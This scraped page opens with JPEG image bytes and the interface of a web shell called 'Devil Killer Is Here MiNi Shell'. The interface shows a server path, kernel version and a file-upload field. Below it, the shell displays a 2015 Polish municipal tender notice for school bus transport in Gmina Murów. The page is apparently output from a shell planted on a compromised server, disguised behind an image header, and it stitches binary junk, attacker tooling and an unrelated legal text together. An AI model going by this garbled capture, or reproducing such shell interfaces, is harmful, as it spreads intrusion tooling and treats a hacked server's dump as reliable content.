JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150630/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150630/159712-N-2015.html

<p class="kh_header"><b>Murów: Dowóz uczniów wraz  z opiekunami  do szkół i przedszkoli na terenie Gminy 
 Murów   w formie zakupu biletów miesięcznych w ramach przewozów regularnych      na lata szkolne  2015/2016,2016/2017 oraz  dowóz uczniów z Publicznego Gimnazjum do sali  gimnastycznej - ( z podziałem na dwie części) II przetarg.</b><br>
<b>Numer ogłoszenia: 159712 - 2015; data zamieszczenia: 30.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Murów , ul. Dworcowa 2, 46-030 Murów, woj. opolskie, tel. 0-77 4214034, faks 0-77 4214032.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.murow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowóz uczniów wraz  z opiekunami  do szkół i przedszkoli na terenie Gminy 
 Murów   w formie zakupu biletów miesięcznych w ramach przewozów regularnych      na lata szkolne  2015/2016,2016/2017 oraz  dowóz uczniów z Publicznego Gimnazjum do sali  gimnastycznej - ( z podziałem na dwie części) II przetarg..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> zadanie częściowe nr I-Dowóz uczniów wraz z opiekunami do szkół i przedszkoli na terenie Gminy Murów w formie zakupu biletów miesięcznych w ramach przewozów regularnych na lata szkolne 2015/2016,2016/2017
1. Zakres zamówienia obejmuje:
    1)  Sprzedaż biletów miesięcznych dla uczniów dojeżdżających do szkół  
         podstawowych, gimnazjum i dzieci do przedszkoli na terenie Gminy Murów i z 
         powrotem we  wszystkie dni nauki szkolnej zgodnie z zestawieniem dojazdów 
         uczniów do szkół i  przedszkoli  stanowiącym załącznik nr 1 do SIWZ. 
         Zamówienie będzie realizowane  w ramach przewozów regularnych w Krajowym 
         transporcie drogowym na podstawie ustawy z dnia 6 września 2001r. o 
         transporcie drogowym (Dz.U. z 2013r poz.1414).
   2)   Dopuszcza się, o ile będą miejsca w autobusach/busach , przewozy innych 
         osób,   które  będą ponosić koszty przejazdu na rzecz przewoźnika, z 
         zastrzeżeniem zapisów  ustawy z 20 czerwca 1992r. o uprawnieniach do 
         ulgowych przejazdów środkami  publicznego   transportu zbiorowego (Dz.U. z 
         2012r.poz..1138 z późn. zm.).
  3)    Uczeń nie może być wcześniej w placówce oświatowej niż pół godziny przed 
         godziną  rozpoczęcia zajęć lekcyjnych w szkole. Faktyczne  godziny odjazdów 
         autobusów Wykonawca  ustali z dyrektorami poszczególnych szkół   
         przedszkoli.
  4)    Wykonawca jest zobowiązany zapewnić punktualny i bezpieczny dowóz 
         uczniów do  szkół i dzieci do przedszkoli.
  5)    Ilość i wielkość pojazdów na danym odcinku dostosować należy do ilości 
          przewożonych uczniów i dzieci do przedszkoli.
  6)    Łączna liczba uczniów do przewiezienia do szkół i przedszkoli i z powrotem  
         wynosi 236 w tym: 213 uczniów i dzieci przedszkolnych dowożonych w w 
         formie  zakupu biletów miesięcznych  i 23 dzieci dowożonych do przedszkoli 
         nie objętych biletami miesięcznymi. Dzienna trasa dowozu wynosi około 360 km.
  7)    Długość tras może ulec zmianie po przeprowadzeniu wizji lokalnej przed 
          sporządzeniem oferty.
  8)    Wykonawca zapewni bezpłatny przejazd opiekunom wyznaczonym na danej 
         trasie,  opiekę w trakcie  dowożenia zapewnia Zamawiający.
  9)    W przypadku awarii wyznaczonego autobusu Wykonawca podstawi 
         niezwłocznie , nie  później jednak niż w ciągu 60 minut od powstania awarii,   
         autobus spełniający właściwe  wymagania techniczne w ruchu drogowym. W 
         przypadku niemożności  zrealizowania przewozu Wykonawca pokryje  
         dodatkowo koszty przewozu wynikłe z  wykonania  usługi przez podmiot 
         zastępczy wybrany przez Zamawiającego.
10)    Wykonawca uwzględni możliwość sporadycznych zmian godzin dowozu uczniów 
         i  odbiór wynikających z organizacji pracy szkoły czy przedszkola.
11)    Z uwagi na utrudniony manewr nawracania na drodze w miejscowości Święciny 
         i w  miejscowości Okoły Zamawiający przewiduje na tych trasach dowóz 
         uczniów  busami.
12)    W przypadku odmiennej organizacji pracy szkoły i skrócenia zajęć lekcyjnych
          np. w dniu rekolekcji, dni sprawdzianów i egzaminów zewnętrznych, sprzątanie
          świata,  w  przeddzień ferii świątecznych itp. Wykonawca zapewni odwóz 
          uczniów we  wcześniejszych godzinach. Wcześniejsza organizacja odwozów 
          nie stanowi  dodatkowych   
          zadań, należy je wkalkulować w cenę biletów.
13)    Ostateczna ilość kursów powrotnych wynikająca z organizacji pracy szkoły z 
         uwzględnieniem przystanków oraz ewentualnych innych punktów odbioru dzieci 
         na  trasach uzgodnionych z Wykonawcą,  zostaną określone po sporządzeniu 
         planu zajęć w jednostkach oświatowych pomiędzy Dyrektorami Szkół i 
          Przedszkoli a Wykonawcą.  Wykaz przystanków stanowi załącznik nr 2 do 
          SIWZ.
14)   Bilety miesięczne będą przekazywane poszczególnym dyrektorom szkół i 
        przedszkoli  przez Wykonawcę najpóźniej do dnia 20 miesiąca poprzedzającego 
        miesiąc wykonania zamówienia. Wykonawca na podstawie załącznika nr 3 do 
         SIWZ będzie wystawiał  fakturę i  przekaże ją Zamawiającemu..
15)    Rozkład jazdy autobusów musi przewidywać przystanki w miejscowościach
        określonych    w zestawieniu. Na przystankach, o których mowa w zdaniu 
         poprzednim, Wykonawca jest zobowiązany umieścić dodatkową informację 
        ( obok zwykłego rozkładu    jazdy) o   godzinach odjazdu i przyjazdów w 
         ramach niniejszej umowy.
16)    Uczniowie z miejscowości: Młodnik, Radomierowice, Święciny, Grabice winne 
         być dowiezione do Publicznego Gimanzjum w Zagwiździu ( zatoczka przy 
         gimnazjum).
Miejsce wykonywania zamówienia
   
  1. Publiczna Szkoła Podstawowa w Murowie ul. Wolności 20
  2. Publiczna Szkoła Podstawowa w Starych Budkowicach ul. Wołczyńska 14
  3. Publiczne Gimnazjum w Zagwiździu ul. Lipowa 68
  4. Publiczne Przedszkole w Murowie ul. Lipowa 17
  5. Publiczne Przedszkole w Starych Budkowicach ul. Wołczyńska 2
  6. Publiczne Przedszkole w Zagwiździu ul. Lipowa 12A

Zadanie częściowe nr II -Dowóz uczniów wraz z opiekunami  z Publicznego Gimnazjum w Zagwiździu do sali gimnastycznej w  Zagwiździu .
  1)   Przewóz uczniów na zajęcia wychowania fizycznego z Publicznego Gimnazjum w 
       Zagwiździu do sali gimnastycznej w Zagwiżdziu, zgodnie z harmonogramem 
        przejazdów opracowanym przez Dyrektora Publicznego Gimnazjum w 
        Zagwiździu  po  sporządzeniu planu zajęć w Publicznym Gimnazjum w terminie 
        do 26 sierpnia każdego  roku wykonywanej usługi.

  2)   Ilość kursów: 
        poniedziałek  - dowóz  do sali i powrót- 2 kursy 
        orientacyjna ilość kilometrów do przejechania 3,60 km
        wtorek- dowóz do sali  i powrót - 3 kursy
        orientacyjna ilość kilometrów do przejechania  5,40km
        środa - dowóz do sali i powrót - 2 kursy
        orientacyjna ilość kilometrów do przejechania 3,60 km
        czwartek - dowóz do Sali i powrót - 1 kurs
        orientacyjna ilość kilometrów do przejechania 1,80 km
        piątek - dowóz do sali i powrót - 2 kursy 
        orientacyjna ilość kilometrów do przejechania 3,60 km
Należy rozumieć 1 kurs jako dowóz z Gimnazjum  do sali i powrót.
W ciągu tygodnia średnio 2 kursy dziennie.
3)    Orientacyjna liczba uczniów przewożona jednym kursem od 18  do 22.
        Podane liczby uczniów oraz ilość kursów w danym dniu tygodnia są liczbami 
       aktualnymi na dzień ogłoszenia o zamówieniu publicznym. 
       Szczegółowy harmonogram przewozu uczniów zostanie opracowany przez 
       Dyrektora  Publicznego Gimnazjum w Zagwiździu i przekazany Wykonawcy do 
       dnia 26 sierpnia  danego roku szkolnego objętego zamówieniem. Harmonogram 
       stanowić będzie  załącznik do umowy
4)  Wykonawca musi dysponować minimum jednym autobusem z kierowcą - z ilością 
        miejsc siedzących zapewniającą obsługę wymaganej ilości uczniów.
5)    Wykonawca zapewni bezpłatny przejazd opiekunowi, opiekę w trakcie dowożenia 
       zapewnia Zamawiający.
6)    W przypadku awarii wyznaczonego autobusu Wykonawca podstawi niezwłocznie 
      autobus spełniający właściwe wymagania techniczne w ruchu drogowym. W 
      przypadku niemożności zrealizowania przewozu Wykonawca pokryje dodatkowo 
       koszty  przewozu   wynikłe z wykonania  usługi  przez podmiot zastępczy 
       wybrany przez Zamawiającego.
7)   Pojazd służący do przewozu uczniów musi być oznakowany zgodnie z przepisami 
       prawa o ruchu drogowym i transporcie osób.
 8)  Zamawiający nie dopuszcza wykonania usługi w ramach regularnej komunikacji    
       autobusowej za sprzedażą biletów miesięcznych.

Miejsce wykonywania zamówienia:
 Publiczne Gimnazjum Zagwiździe ul. Lipowa 68
 Sala gimnastyczna Zagwiździe ul. Lipowa 1

Każdy Wykonawca winien przeprowadzić wizję lokalną trasy- w celu uzyskania wszelkich informacji koniecznych do przygotowania oferty, szczególnie należy sprawdzić ilość kilometrów na trasie, gdyż wyklucza się możliwość roszczeń z tytułu błędnego skalkulowania ceny lub pominięcia elementów niezbędnych do wykonania umowy.Koszt wizji lokalne ponosi Wykonawca..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6, 60.11.50.00-7, 60.11.30.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium.
 Ustala się wadium w wysokości: 
    1.  5.100,00złotych, (słownie: pięć tysięcy sto złotych)- dla zadania częściowego 
         nr I
    2.   500,00złotych ( słownie: pięćset złotych) - dla zadania częściowego nr II

 3. Wadium należy wnieść przed terminem składania ofert, określonego  w Rozdziale  
    12 niniejszej SIWZ, przy czym za termin wniesienia  wadium w formie pieniężnej za 
    pomocą przelewu bankowego Zamawiający będzie  uważał za  skuteczne tylko 
    wówczas, gdy bank prowadzący rachunek  Zamawiającego potwierdzi, że kwota   
    przelewu znajdzie się na tym rachunku  przed upływem terminu  składania ofert. 
 3.   Wadium może być wnoszone w jednej lub kilku następujących formach:
              1)   w pieniądzu,
              2)   w poręczeniach bankowych lub poręczeniach spółdzielczej kasy 
                   oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze 
                   poręczeniem pieniężnym,
              3)   w gwarancjach bankowych
              4)   w gwarancjach ubezpieczeniowych,
              5)  w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b 
                  ust.  5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej 
                 Agencji  Rozwoju  Przedsiębiorczości ( Dz. U. Nr 109, poz. 1158, z późn. 
                 zm).
Wadium wnoszone w pieniądzu wpłaca się PRZELEWEM na rachunek bankowy   
Zamawiającego Bank  Spółdzielczy Łubniany  Nr  21 8897 0004 2001 0006 0163 0003  z  dopiskiem Wadium -Dowóz uczniów wraz  z opiekunami  do szkół i przedszkoli na terenie Gminy Murów w formie zakupu biletów miesięcznych w ramach przewozów regularnych  na  lata szkolne  2015-2016, 2016-2017 - zadanie częściowe nr I 
lub
Dowóz uczniów z Publicznego Gimnazjum do sali   gimnastycznej  - zdanie częściowe nr II
Do oferty należy dołączyć kopię polecenia przelewu lub kserokopię potwierdzoną za    zgodność z oryginałem - przez osoby odpowiednio upoważnione do reprezentowania.
Wadium wnoszone w formie poręczeń lub gwarancji winno być złożone w oryginale.
Oryginał dokumentu wraz z jego kopią ( potwierdzoną za zgodność z oryginałem) należy dołączyć do oferty. Oryginał należy załączyć do oferty w taki sposób, aby umożliwić zamawiającemu jego wyjęcie i zwrot bez uszkodzenia.          

4. Wadium składane w formie gwarancji i/lub poręczenia, gwarancja i lub poręczenie   
      powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać, między innymi następujące elementy: 
       1)  nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji i lub 
            poręczenia  (Zamawiającego),gwaranta i lub poręczyciela (banku lub 
            instytucji ubezpieczeniowej  udzielających gwarancji i lub poręczenia) oraz 
            wskazanie ich siedzib.
       2)  dokładne przytoczenie nazwy i przedmiotu niniejszego postępowania
       3) precyzyjne określenie wierzytelności, która ma być zabezpieczona gwarancją 
           i lub   poręczeniem,
       4)  kwotę gwarancji i lub poręczenia,
       5)  termin ważności gwarancji i lub poręczenia 
       6) zobowiązanie gwaranta i lub poręczyciela do: nieodwołalnego 
           bezwarunkowego zapłacenia kwoty gwarancji i lub poręczenia na pierwsze 
           pisemne żądanie Zamawiającego zawierającego oświadczenie, iż:
            - Wykonawca w odpowiedzi na wezwanie do uzupełnienia oświadczeń,  
               dokumentów lub pełnomocnictw o którym mowa w art. 26 ust. 3 Ustawy 
              Pzp., nie złożył wymaganych   dokumentów lub oświadczeń, o których  
              mowa w art. 25 ust. 1 Ustawy Pzp. lub pełnomocnictw, listy podmiotów 
              należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 
             pkt 5, lub informacji  o tym, że nie należy do grupy kapitałowej, lub nie 
            wyraził zgody na poprawienie omyłki , o której mowa w art. 87 ust. 2 pkt 3, 
            co powodowało brak możliwości wybrania oferty złożonej przez Wykonawcę 
            jako najkorzystniejszej chyba, że Wykonawca udowodni, że wynika to z 
            przyczyn nieleżących  po jego stronie, lub
           -  Wykonawca, którego ofertę wybrano odmówił podpisania umowy na 
              warunkach   określonych w ofercie , lub
           -  Wykonawca, którego ofertę wybrano nie wniósł zabezpieczenia należytego 
               wykonania umowy, lub
           -  zawarcie umowy, z Wykonawcą, którego ofertę wybrano, stało się 
              niemożliwe z  przyczyn leżących po stronie Wykonawcy;
        7)  okres ważności gwarancji i  lub poręczenia nie może być  krótszy niż okres 
              związania ofert.
5.  Zamawiający zwróci niezwłocznie wadium wszystkim wykonawcom po wyborze 
     najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem 
     Wykonawcy,  którego oferta zostanie wybrana jako najkorzystniejsza. 
6.   Wykonawcy , którego oferta zostanie wybrana jako najkorzystniejsza 
      Zamawiający   zwróci wadium niezwłocznie po zawarciu umowy .
7.    Zamawiający zwróci niezwłocznie wadium  wraz z odsetkami na wniosek 
       Wykonawcy, który wycofał ofertę przed terminem składania ofert.
8.   W sprawie wadium obowiązują uregulowania ustawy- Prawo zamówień 
      publicznych  zawarte w art. 45 i 46.
9.   Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje 
      wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 2 ustawy Pzp.
10.  W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia 
      wadium  (w każdej z dopuszczalnych form) może być wniesione przez jednego, 
       kilku lub  wszystkich Wykonawców, pod warunkiem, iż łączna wysokość 
       wniesionego wadium   odpowiadać będzie wymaganej kwocie. W takim 
       przypadku składając wadium należy   wskazać w imieniu kogo i tytułem jakiego 
      postępowania jest wnoszone.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla zadania częściowego nr I- O udzielenie zamówienia ubiegać się mogą wszyscy Wykonawcy, którzy:
Spełniają warunki określone w art. 22  ust. 1 ustawy PzP, dotyczące:
 1) posiadania uprawnień do wykonywania określonej działalności lub czynności, 
     jeżeli    przepisy prawa nakładają obowiązek ich posiadania tj; 
     posiadają aktualną licencję na wykonywanie na przewóz osób pojazdami
     samochodowymi, zgodnie z Ustawą z dnia 6 września 2001r. o transporcie   
     drogowym  (t.j Dz.U. Z 2013r. poz. 1414 z późn. zm.).
Dla zadania częściowego nr II
1.O udzielenie zamówienia ubiegać się mogą wszyscy Wykonawcy, którzy:
   Spełniają warunki określone w art. 22  ust. 1 ustawy PzP, dotyczące:
   1) posiadania uprawnień do wykonywania określonej działalności lub czynności, 
      jeżeli przepisy prawa nakładają obowiązek ich posiadania tj; 
      posiadają aktualną licencję na wykonywanie na przewóz osób pojazdami
      samochodowymi, zgodnie z Ustawą z dnia 6 września 2001r. o transporcie    
      drogowym  (t.j Dz.U. Z 2013r. poz. 1414 z późn. zm.).  
Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w  postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia  i dokumenty wg. metody spełnia/ nie spełnia co musi wynikać jednoznacznie z treści oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla zadania częściowego nr I - posiadania wiedzy i doświadczenia, tj. wykonali, a w przypadku świadczeń okresowych  lub ciągłych również wykonywanych usług  w okresie ostatnich trzech  lat przed  upływem  terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy-    w tym okresie co najmniej:  dwa  zadania  polegające na dowozie dzieci do szkół lub  przedszkoli o wartości minimum 80.000,00zł brutto każde, realizowane nieprzerwalnie w  okresie  10 m-cy.
 Dla zadania częściowego nr II- posiadania wiedzy i doświadczenia
 Zamawiający nie dokonuje opisu sposobu oceny spełniania tego warunku. 
Zamawiający  uzna warunek za spełniony na podstawie stosownego oświadczenia złożonego zgodnie ze wzorem określonym w załączniku nr  4 do SIWZ.
Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w  postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia  i dokumenty wg. metody spełnia/ nie spełnia co musi wynikać jednoznacznie z treści oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla zadania częściowego nr I- dysponowania odpowiednim potencjałem technicznym tj.: posiadają  lub mają dostęp do odpowiedniej ilości taboru samochodowego niezbędnego do wykonania niniejszego zamówienia- dysponują co najmniej:
       3 sprawnymi autobusami 
       2 sprawnymi busami
Dla zadania częściowego nr II-  dysponowania odpowiednim potencjałem technicznym tj.:  posiadają  lub mają dostęp do odpowiedniej ilości taboru samochodowego niezbędnego   do wykonania niniejszego zamówienia- dysponują co najmniej: 1  sprawnym  autobusem 
Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w  postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia  i dokumenty wg. metody spełnia/ nie spełnia co musi wynikać jednoznacznie z treści oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla zadania częściowego nr I-Dysponowania  osobami zdolnymi do wykonania zamówienia tj:Wykonawca zobowiązany jest wskazać ,że dysponuje lub będzie dysponował co   najmniej 5 kierowcami autobusów , którzy posiadają ważne prawo jazdy kat. D, oraz ważne świadectwo kwalifikacji lub zaświadczenie oraz min. 3 letnie  doświadczenie w zakresie przewozu osób.
Dla zadania częściowego nr II- dysponowania  osobami zdolnymi do wykonania zamówienia tj: Wykonawca zobowiązany jest wskazać ,że dysponuje lub będzie dysponował co  najmniej jednym  kierowcą autobusu , posiadającym ważne prawo jazdy kat. D,  oraz  ważne świadectwo kwalifikacji lub zaświadczenie oraz min. 3 letnie doświadczenie w zakresie przewozu osób.
Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w  postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia  i dokumenty wg. metody spełnia/ nie spełnia co musi wynikać jednoznacznie z treści oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla zadania częściowego nr I-  Zamawiający nie dokonuje opisu sposobu oceny spełniania tego warunku. Zamawiający uzna warunek za spełniony na podstawie stosownego oświadczenia złożonego zgodnie ze wzorem określonym w załączniku nr  4 do SIWZ.
Dla zadania częściowego nr II- Zamawiający nie dokonuje opisu sposobu oceny spełniania tego warunku. Zamawiający uzna warunek za spełniony na podstawie stosownego oświadczenia złożonego zgodnie ze wzorem określonym w załączniku nr  4 do SIWZ.
Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w  postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia  i dokumenty wg. metody spełnia/ nie spełnia co musi wynikać jednoznacznie z treści oświadczeń i dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

